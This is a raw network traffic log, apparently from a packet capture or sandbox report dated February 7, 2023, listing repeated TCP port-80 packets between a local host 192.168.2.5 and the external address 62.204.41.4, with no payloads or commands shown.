Feb 7, 2023 19:59:03.484019041 CET	80	50133	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:03.484225988 CET	50133	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:04.255132914 CET	50133	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:04.256469011 CET	50134	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:04.317050934 CET	80	50134	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:04.317245007 CET	50134	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:04.317590952 CET	80	50133	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:04.317673922 CET	50133	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:04.959508896 CET	50134	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.022169113 CET	80	50134	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.025031090 CET	80	50134	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.025125980 CET	50134	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.492608070 CET	50134	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.493544102 CET	50135	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.552875042 CET	80	50135	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.553009987 CET	80	50134	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.553158998 CET	50134	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.554780006 CET	50135	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.579215050 CET	50135	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.638536930 CET	80	50135	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.642651081 CET	80	50135	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.642869949 CET	50135	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.830444098 CET	50135	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.831294060 CET	50136	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.889965057 CET	80	50135	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.890732050 CET	50135	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.891866922 CET	80	50136	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.892026901 CET	50136	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.899724007 CET	50136	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:05.962033033 CET	80	50136	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.962744951 CET	80	50136	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:05.962903023 CET	50136	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.076451063 CET	50136	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.077325106 CET	50137	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.137145996 CET	80	50136	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.137283087 CET	50136	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.137598991 CET	80	50137	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.137722015 CET	50137	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.138197899 CET	50137	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.198606968 CET	80	50137	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.202161074 CET	80	50137	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.202338934 CET	50137	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.353764057 CET	50137	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.357353926 CET	50139	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.414702892 CET	80	50137	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.414823055 CET	50137	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.417829037 CET	80	50139	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.417989016 CET	50139	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.422233105 CET	50139	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.482515097 CET	80	50139	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.484899044 CET	80	50139	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.484988928 CET	50139	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.590141058 CET	50139	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.591065884 CET	50140	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.650527954 CET	80	50139	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.650679111 CET	50139	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.651550055 CET	80	50140	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.651674032 CET	50140	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.654083967 CET	50140	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.714600086 CET	80	50140	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.717000961 CET	80	50140	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.717164040 CET	50140	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.823772907 CET	50140	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.824795008 CET	50141	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.884526014 CET	80	50140	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.884721994 CET	50140	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.885008097 CET	80	50141	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.885150909 CET	50141	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.885723114 CET	50141	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:06.945969105 CET	80	50141	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.948308945 CET	80	50141	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:06.948477983 CET	50141	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.058243036 CET	50141	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.059066057 CET	50142	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.118662119 CET	80	50141	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.118807077 CET	50141	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.120419025 CET	80	50142	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.120562077 CET	50142	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.121016026 CET	50142	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.182353973 CET	80	50142	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.186088085 CET	80	50142	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.186259985 CET	50142	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.292864084 CET	50142	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.294056892 CET	50143	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.356136084 CET	80	50142	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.356293917 CET	50142	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.356703997 CET	80	50143	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.356827021 CET	50143	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.357882023 CET	50143	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.420399904 CET	80	50143	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.423434973 CET	80	50143	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.423607111 CET	50143	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.527201891 CET	50143	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.528356075 CET	50144	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.588938951 CET	80	50143	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.589032888 CET	50143	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.590699911 CET	80	50144	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.590961933 CET	50144	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.591285944 CET	50144	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.653460026 CET	80	50144	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.656039000 CET	80	50144	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.656186104 CET	50144	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.760818005 CET	50144	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.761162996 CET	50145	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.822401047 CET	80	50145	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.822616100 CET	50145	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.823730946 CET	50145	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.823755980 CET	80	50144	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.823925018 CET	50144	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.884711981 CET	80	50145	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.886898041 CET	80	50145	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:07.887084007 CET	50145	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.995286942 CET	50145	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:07.996071100 CET	50146	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.056570053 CET	80	50145	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.056736946 CET	50145	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.057559013 CET	80	50146	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.057698011 CET	50146	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.058254004 CET	50146	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.119925022 CET	80	50146	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.123910904 CET	80	50146	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.124128103 CET	50146	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.236212969 CET	50146	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.236949921 CET	50147	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.301107883 CET	80	50146	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.301136971 CET	80	50147	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.301296949 CET	50146	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.301336050 CET	50147	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.302721024 CET	50147	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.364974976 CET	80	50147	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.367331028 CET	80	50147	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.367530107 CET	50147	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.483133078 CET	50147	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.483870029 CET	50148	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.545579910 CET	80	50147	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.545713902 CET	50147	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.546073914 CET	80	50148	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.546236992 CET	50148	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.546698093 CET	50148	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.609252930 CET	80	50148	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.611357927 CET	80	50148	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.611510038 CET	50148	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.735811949 CET	50148	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.736777067 CET	50149	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.798922062 CET	80	50148	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.799015999 CET	50148	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.799093962 CET	80	50149	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.801457882 CET	50149	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.801457882 CET	50149	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.863096952 CET	80	50149	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.865505934 CET	80	50149	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:08.865684032 CET	50149	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.980357885 CET	50149	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:08.980902910 CET	50150	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.040426970 CET	80	50150	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.040571928 CET	50150	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.040992022 CET	50150	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.041929960 CET	80	50149	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.042076111 CET	50149	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.100342989 CET	80	50150	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.104100943 CET	80	50150	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.104229927 CET	50150	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.214858055 CET	50150	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.215857029 CET	50151	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.274271011 CET	80	50150	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.274403095 CET	50150	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.275996923 CET	80	50151	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.276103020 CET	50151	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.287465096 CET	50151	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.348027945 CET	80	50151	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.350429058 CET	80	50151	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.350553989 CET	50151	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.469851971 CET	50151	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.470716953 CET	50152	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.531146049 CET	80	50151	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.531260014 CET	50151	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.531291008 CET	80	50152	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.531369925 CET	50152	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.531893969 CET	50152	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.592374086 CET	80	50152	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.594541073 CET	80	50152	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.597688913 CET	50152	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.713810921 CET	50152	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.714458942 CET	50153	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.774363995 CET	80	50152	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.774907112 CET	80	50153	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.775096893 CET	50152	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.775113106 CET	50153	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.775607109 CET	50153	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.836025000 CET	80	50153	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.838295937 CET	80	50153	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:09.841820002 CET	50153	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.948337078 CET	50153	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:09.949150085 CET	50154	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.009356022 CET	80	50153	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.009392977 CET	80	50154	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.009572983 CET	50153	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.009634018 CET	50154	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.010091066 CET	50154	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.072519064 CET	80	50154	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.075062990 CET	80	50154	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.075191021 CET	50154	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.182871103 CET	50154	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.183609962 CET	50155	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.244438887 CET	80	50154	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.244787931 CET	80	50155	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.244913101 CET	50154	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.244977951 CET	50155	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.245942116 CET	50155	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.306488037 CET	80	50155	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.309608936 CET	80	50155	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.309828043 CET	50155	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.418171883 CET	50155	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.419137955 CET	50156	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.479022026 CET	80	50155	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.479163885 CET	50155	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.481301069 CET	80	50156	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.481492043 CET	50156	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.481823921 CET	50156	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.543529034 CET	80	50156	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.545644999 CET	80	50156	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.545749903 CET	50156	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.698434114 CET	50156	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.699196100 CET	50157	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.760106087 CET	80	50156	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.760283947 CET	50156	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.760549068 CET	80	50157	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.760679007 CET	50157	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.761627913 CET	50157	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.823153019 CET	80	50157	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.825344086 CET	80	50157	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.825537920 CET	50157	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.932908058 CET	50157	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.933692932 CET	50158	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.994509935 CET	80	50157	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.995160103 CET	80	50158	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:10.995956898 CET	50157	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.996005058 CET	50158	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:10.996736050 CET	50158	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.058295012 CET	80	50158	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.062388897 CET	80	50158	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.062535048 CET	50158	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.167546988 CET	50158	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.168374062 CET	50159	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.228863955 CET	80	50159	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.229152918 CET	50159	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.229185104 CET	80	50158	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.229306936 CET	50158	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.230108976 CET	50159	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.290631056 CET	80	50159	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.293153048 CET	80	50159	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.293337107 CET	50159	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.402561903 CET	50159	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.403816938 CET	50160	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.463196039 CET	80	50159	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.463398933 CET	50159	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.465114117 CET	80	50160	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.465253115 CET	50160	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.468507051 CET	50160	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.529829025 CET	80	50160	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.532876015 CET	80	50160	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.532948971 CET	50160	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.637072086 CET	50160	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.638288975 CET	50161	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.699378014 CET	80	50160	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.699816942 CET	50160	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.699831009 CET	80	50161	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.699934959 CET	50161	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.700305939 CET	50161	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.760962009 CET	80	50161	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.763014078 CET	80	50161	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.763176918 CET	50161	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.883557081 CET	50161	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.884553909 CET	50162	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.944504023 CET	80	50161	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.944603920 CET	50161	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.945051908 CET	80	50162	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:11.945168018 CET	50162	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:11.945538998 CET	50162	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.006215096 CET	80	50162	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.008589029 CET	80	50162	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.008707047 CET	50162	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.122756958 CET	50162	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.123539925 CET	50163	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.183401108 CET	80	50162	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.183568001 CET	50162	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.186285973 CET	80	50163	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.186404943 CET	50163	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.188385010 CET	50163	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.251025915 CET	80	50163	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.254669905 CET	80	50163	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.254748106 CET	50163	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.371431112 CET	50163	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.372342110 CET	50164	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.433669090 CET	80	50164	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.433871984 CET	50164	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.434294939 CET	50164	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.435009956 CET	80	50163	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.435123920 CET	50163	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.495296955 CET	80	50164	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.497351885 CET	80	50164	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.497556925 CET	50164	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.605403900 CET	50164	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.606280088 CET	50165	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.666485071 CET	80	50164	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.668010950 CET	80	50165	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.668162107 CET	50164	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.668236017 CET	50165	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.675415039 CET	50165	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.737181902 CET	80	50165	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.739593029 CET	80	50165	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.739702940 CET	50165	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.890657902 CET	50165	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.891371012 CET	50166	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.951654911 CET	80	50166	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.952501059 CET	80	50165	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:12.952732086 CET	50165	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.953353882 CET	50166	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:12.953353882 CET	50166	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.013576984 CET	80	50166	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.016520977 CET	80	50166	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.016676903 CET	50166	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.120611906 CET	50166	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.121227980 CET	50167	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.180954933 CET	80	50166	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.181271076 CET	50166	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.181790113 CET	80	50167	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.182041883 CET	50167	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.182938099 CET	50167	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.243609905 CET	80	50167	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.247544050 CET	80	50167	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.247665882 CET	50167	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.355623007 CET	50167	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.356450081 CET	50168	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.416836977 CET	80	50167	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.419708967 CET	80	50168	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:13.419899940 CET	50167	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.419951916 CET	50168	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.420495033 CET	50168	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:13.483030081 CET	80	50168	62.204.41.4	192.168.2.5
